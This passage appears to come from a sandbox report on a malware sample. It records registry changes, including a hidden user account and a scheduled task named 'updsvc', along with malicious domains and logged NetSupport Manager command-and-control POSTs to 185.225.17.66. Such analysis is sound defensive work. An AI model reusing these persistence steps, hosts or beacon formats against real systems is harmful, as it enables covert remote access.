  601. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\AllowMultipleTSSessions",
  602. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList",
  603. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList\\WgaUtilAcc",
  604. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Terminal Services\\fAllowToGetHelp",
  605. "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Terminal Server\\RCM\\Secrets",
  606. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\RCM\\Secrets\\L$HYDRAENCKEY_28ada6da-d622-11d1-9cb9-00c04fb16e75",
  607. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\RCM\\Certificate",
  608. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\RCM\\Secrets\\L$HYDRAENCKEY_52d1ad03-4565-44f3-8bfd-bbb0591f4b9d",
  609. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\RCM\\CertificateOld",
  610. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\\Blob",
  611. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Consent",
  612. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Consent\\DefaultConsent",
  613. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\4CBF3D1D-5FEB-4971-B977-59608B4DCACE\\Path",
  614. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\4CBF3D1D-5FEB-4971-B977-59608B4DCACE\\Hash",
  615. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\updsvc\\Id",
  616. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\updsvc\\Index",
  617. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\4CBF3D1D-5FEB-4971-B977-59608B4DCACE\\Triggers",
  618. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\4CBF3D1D-5FEB-4971-B977-59608B4DCACE\\DynamicInfo",
  619. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\ED0D73D7-BC97-46E2-AC55-FD6EB3F72C05\\DynamicInfo",
  620. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\1C9308F0-8A41-4006-B814-D2F5B13BEDB5",
  621. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\B17E070E-57E3-43F6-96F5-A9A9C921DEBF\\DynamicInfo",
  622. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\8D661787-E909-433D-BDE3-477DCB39306A",
  623. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\DF000DCA-3FA2-48A6-9E59-C0606F9F8D73\\DynamicInfo",
  624. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\1C9308F0-8A41-4006-B814-D2F5B13BEDB5\\data"
  625.  
  626.  
  627. * Deleted Registry Keys:
  628. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\RCM\\OverrideProtocol_Object",
  629. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\DAC9024F54D8F6DF94935FB1732638CA6AD77C13",
  630. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\CompatibilityAdapter\\Signatures\\updsvc.job",
  631. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\CompatibilityAdapter\\Signatures\\updsvc.job.fp"
  632.  
  633.  
  634. * DNS Communications:
  635.  
  636. "type": "A",
  637. "request": "gidjshrvz.xyz",
  638. "answers":
  639.  
  640. "data": "",
  641. "type": "NXDOMAIN"
  642.  
  643.  
  644.  
  645.  
  646. "type": "A",
  647. "request": "pofasfafha.xyz",
  648. "answers":
  649.  
  650. "data": "185.225.17.169",
  651. "type": "A"
  652.  
  653.  
  654.  
  655.  
  656. "type": "A",
  657. "request": "apps.identrust.com",
  658. "answers":
  659.  
  660. "data": "192.35.177.64",
  661. "type": "A"
  662.  
  663.  
  664. "data": "apps.digsigtrust.com",
  665. "type": "CNAME"
  666.  
  667.  
  668.  
  669.  
  670. "type": "A",
  671. "request": "fdguyt5ggs.pw",
  672. "answers":
  673.  
  674. "data": "",
  675. "type": "NXDOMAIN"
  676.  
  677.  
  678.  
  679.  
  680. "type": "A",
  681. "request": "letitbe.icu",
  682. "answers":
  683.  
  684. "data": "185.225.17.169",
  685. "type": "A"
  686.  
  687.  
  688.  
  689.  
  690. "type": "A",
  691. "request": "geo.netsupportsoftware.com",
  692. "answers":
  693.  
  694. "data": "62.172.138.35",
  695. "type": "A"
  696.  
  697.  
  698. "data": "geograph.netsupportsoftware.com",
  699. "type": "CNAME"
  700.  
  701.  
  702. "data": "195.171.92.116",
  703. "type": "A"
  704.  
  705.  
  706.  
  707.  
  708.  
  709. * Domains:
  710.  
  711. "ip": "",
  712. "domain": "fdguyt5ggs.pw"
  713.  
  714.  
  715. "ip": "185.225.17.169",
  716. "domain": "pofasfafha.xyz"
  717.  
  718.  
  719. "ip": "192.35.177.64",
  720. "domain": "apps.identrust.com"
  721.  
  722.  
  723. "ip": "",
  724. "domain": "gidjshrvz.xyz"
  725.  
  726.  
  727. "ip": "62.172.138.35",
  728. "domain": "geo.netsupportsoftware.com"
  729.  
  730.  
  731. "ip": "185.225.17.169",
  732. "domain": "letitbe.icu"
  733.  
  734.  
  735.  
  736. * Network Communication - ICMP:
  737.  
  738. * Network Communication - HTTP:
  739.  
  740. "count": 1,
  741. "body": "",
  742. "uri": "http://apps.identrust.com/roots/dstrootcax3.p7c",
  743. "user-agent": "Microsoft-CryptoAPI/6.1",
  744. "method": "GET",
  745. "host": "apps.identrust.com",
  746. "version": "1.1",
  747. "path": "/roots/dstrootcax3.p7c",
  748. "data": "GET /roots/dstrootcax3.p7c HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: apps.identrust.com\r\n\r\n",
  749. "port": 80
  750.  
  751.  
  752. "count": 1,
  753. "body": "",
  754. "uri": "http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab",
  755. "user-agent": "Microsoft-CryptoAPI/6.1",
  756. "method": "GET",
  757. "host": "www.download.windowsupdate.com",
  758. "version": "1.1",
  759. "path": "/msdownload/update/v3/static/trustedr/en/authrootstl.cab",
  760. "data": "GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1\r\nCache-Control: max-age = 89965\r\nConnection: Keep-Alive\r\nAccept: */*\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: www.download.windowsupdate.com\r\n\r\n",
  761. "port": 80
  762.  
  763.  
  764. "count": 1,
  765. "body": "",
  766. "uri": "http://letitbe.icu/2.txt",
  767. "user-agent": "Embarcadero URI Client/1.0",
  768. "method": "GET",
  769. "host": "letitbe.icu",
  770. "version": "1.1",
  771. "path": "/2.txt",
  772. "data": "GET /2.txt HTTP/1.1\r\nConnection: Keep-Alive\r\nUser-Agent: Embarcadero URI Client/1.0\r\nHost: letitbe.icu\r\n\r\n",
  773. "port": 80
  774.  
  775.  
  776. "count": 1,
  777. "body": "CMD=POLL\nINFO=1\nACK=1\n",
  778. "uri": "http://185.225.17.66:443/http://185.225.17.66/fakeurl.htm",
  779. "user-agent": "NetSupport Manager/1.3",
  780. "method": "POST",
  781. "host": "185.225.17.66",
  782. "version": "1.1",
  783. "path": "http://185.225.17.66/fakeurl.htm",
  784. "data": "POST http://185.225.17.66/fakeurl.htm HTTP/1.1\nUser-Agent: NetSupport Manager/1.3\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 22\nHost: 185.225.17.66\nConnection: Keep-Alive\n\nCMD=POLL\nINFO=1\nACK=1\n",
  785. "port": 443
  786.  
  787.  
  788. "count": 1,
  789. "body": "CMD=ENCD\nES=1\nDATA=u\\xfe2h\\x0cr\\xef\\x024\\xd7\\xa7\\xb1%y-\\xa9\\x85\\xaf\\xcf\\xdc=I\\xad\\x88\\xdeD3\\xbcW\\x8e\\x8ai\\xe97?\\xbf\\x03\\xae\\xc8=@\\xfd\\xec\\xc7\\xc1F\\xe5f\\xd5\\xaa\\x9b\\xe8&t\\xc8\\x05\\xc86ra\\x06\\xfeL\\xe0A\\xf2j\\xda\\xf3\\x1a\\x880\\x9c\\xdc=\\xe29\\x04CE\\x84\\x07-\\xa7U\\xf1\\x8d(\\xb4\\xc4\\x944Z\\x92:\\x9f\\xac\\xd2K\\xccG\\xc5\\xb0\\xf6\\x8f\\xe1P\\x99\\xdb\\xbd\\xe0\\xec\\xcf\\xb5\\\\xf9b\\xf2\\x04\\xf4><\\xc9\\x0b\\xec\\x9c\\xdc=\\xe29\\x04CE\\xa8\\xa3\\x93\\xd2\\xd3\\xe6\\xc0\\x13\\x89\\xa3(\\xf1 \\xca4\\xfd\\xe4\\x83\\xcc\\xa9\\xcb\\xa8 \\x1d\\x9c\\x01-\\x8amc\\x97\\xc1\\x10K\\xcb)\\xf2\\x17\\x97\\x08\\xe66\\x85\\x0f\\xfa)\\xff\\x819\\x0f<\\xcf\\x01\\xea\\xa4\\xbe\\xf6\\xd6\\xeeW\\x18\\xc4t\\xbf_\\xb0\\xd5Az\n",
  790. "uri": "http://185.225.17.66:443/http://185.225.17.66/fakeurl.htm",
  791. "user-agent": "NetSupport Manager/1.3",
  792. "method": "POST",
  793. "host": "185.225.17.66",
  794. "version": "1.1",
  795. "path": "http://185.225.17.66/fakeurl.htm",
  796. "data": "POST http://185.225.17.66/fakeurl.htm HTTP/1.1\nUser-Agent: NetSupport Manager/1.3\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 232\nHost: 185.225.17.66\nConnection: Keep-Alive\n\nCMD=ENCD\nES=1\nDATA=u\\xfe2h\\x0cr\\xef\\x024\\xd7\\xa7\\xb1%y-\\xa9\\x85\\xaf\\xcf\\xdc=I\\xad\\x88\\xdeD3\\xbcW\\x8e\\x8ai\\xe97?\\xbf\\x03\\xae\\xc8=@\\xfd\\xec\\xc7\\xc1F\\xe5f\\xd5\\xaa\\x9b\\xe8&t\\xc8\\x05\\xc86ra\\x06\\xfeL\\xe0A\\xf2j\\xda\\xf3\\x1a\\x880\\x9c\\xdc=\\xe29\\x04CE\\x84\\x07-\\xa7U\\xf1\\x8d(\\xb4\\xc4\\x944Z\\x92:\\x9f\\xac\\xd2K\\xccG\\xc5\\xb0\\xf6\\x8f\\xe1P\\x99\\xdb\\xbd\\xe0\\xec\\xcf\\xb5\\\\xf9b\\xf2\\x04\\xf4><\\xc9\\x0b\\xec\\x9c\\xdc=\\xe29\\x04CE\\xa8\\xa3\\x93\\xd2\\xd3\\xe6\\xc0\\x13\\x89\\xa3(\\xf1 \\xca4\\xfd\\xe4\\x83\\xcc\\xa9\\xcb\\xa8 \\x1d\\x9c\\x01-\\x8amc\\x97\\xc1\\x10K\\xcb)\\xf2\\x17\\x97\\x08\\xe66\\x85\\x0f\\xfa)\\xff\\x819\\x0f<\\xcf\\x01\\xea\\xa4\\xbe\\xf6\\xd6\\xeeW\\x18\\xc4t\\xbf_\\xb0\\xd5Az\n",
  797. "port": 443
  798.  
  799.  
  800. "count": 1,
  801. "body": "",
  802. "uri": "http://geo.netsupportsoftware.com/location/loca.asp",
  803. "user-agent": "",
  804. "method": "GET",
  805. "host": "geo.netsupportsoftware.com",
  806. "version": "1.1",
  807. "path": "/location/loca.asp",
  808. "data": "GET /location/loca.asp HTTP/1.1\r\nHost: geo.netsupportsoftware.com\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n",
  809. "port": 80
  810.  
  811.  
  812. "count": 1,
  813. "body": "CMD=ENCD\nES=1\nDATA=l3\\x1d<(T\\x1aE\\x98\\xf8\\xfb\\x14\\xb9V\\x1a\\x1c\\x9a\\xf3k\\xee9|||$(m\\xf2\\xdb$C(^\\xf5 \\xb2\\xd5\\x85\\x03=M\\xb10Y\\x8f=\\xa36\\xce\\xcb\\x9b\\x84\\x98\\x16\\xfd\\xc9\n",
  814. "uri": "http://185.225.17.66:443/http://185.225.17.66/fakeurl.htm",
  815. "user-agent": "NetSupport Manager/1.3",
  816. "method": "POST",
  817. "host": "185.225.17.66",
  818. "version": "1.1",
  819. "path": "http://185.225.17.66/fakeurl.htm",
  820. "data": "POST http://185.225.17.66/fakeurl.htm HTTP/1.1\nUser-Agent: NetSupport Manager/1.3\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 78\nHost: 185.225.17.66\nConnection: Keep-Alive\n\nCMD=ENCD\nES=1\nDATA=l3\\x1d<(T\\x1aE\\x98\\xf8\\xfb\\x14\\xb9V\\x1a\\x1c\\x9a\\xf3k\\xee9|||$(m\\xf2\\xdb$C(^\\xf5 \\xb2\\xd5\\x85\\x03=M\\xb10Y\\x8f=\\xa36\\xce\\xcb\\x9b\\x84\\x98\\x16\\xfd\\xc9\n",
  821. "port": 443
  822.  
  823.  
  824. "count": 4,
  825. "body": "CMD=ENCD\nES=1\nDATA=\\x93\\xe8#\\x0e\\xedmH\\xee\\xe5UAA\\xb6\\x89g\\xf8\n",
  826. "uri": "http://185.225.17.66:443/http://185.225.17.66/fakeurl.htm",
  827. "user-agent": "NetSupport Manager/1.3",
  828. "method": "POST",
  829. "host": "185.225.17.66",
  830. "version": "1.1",
  831. "path": "http://185.225.17.66/fakeurl.htm",
  832. "data": "POST http://185.225.17.66/fakeurl.htm HTTP/1.1\nUser-Agent: NetSupport Manager/1.3\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 36\nHost: 185.225.17.66\nConnection: Keep-Alive\n\nCMD=ENCD\nES=1\nDATA=\\x93\\xe8#\\x0e\\xedmH\\xee\\xe5UAA\\xb6\\x89g\\xf8\n",
  833. "port": 443
  834.  
  835.  
  836.  
  837. * Network Communication - SMTP:
  838.  
  839. * Network Communication - Hosts:
  840.  
  841. * Network Communication - IRC: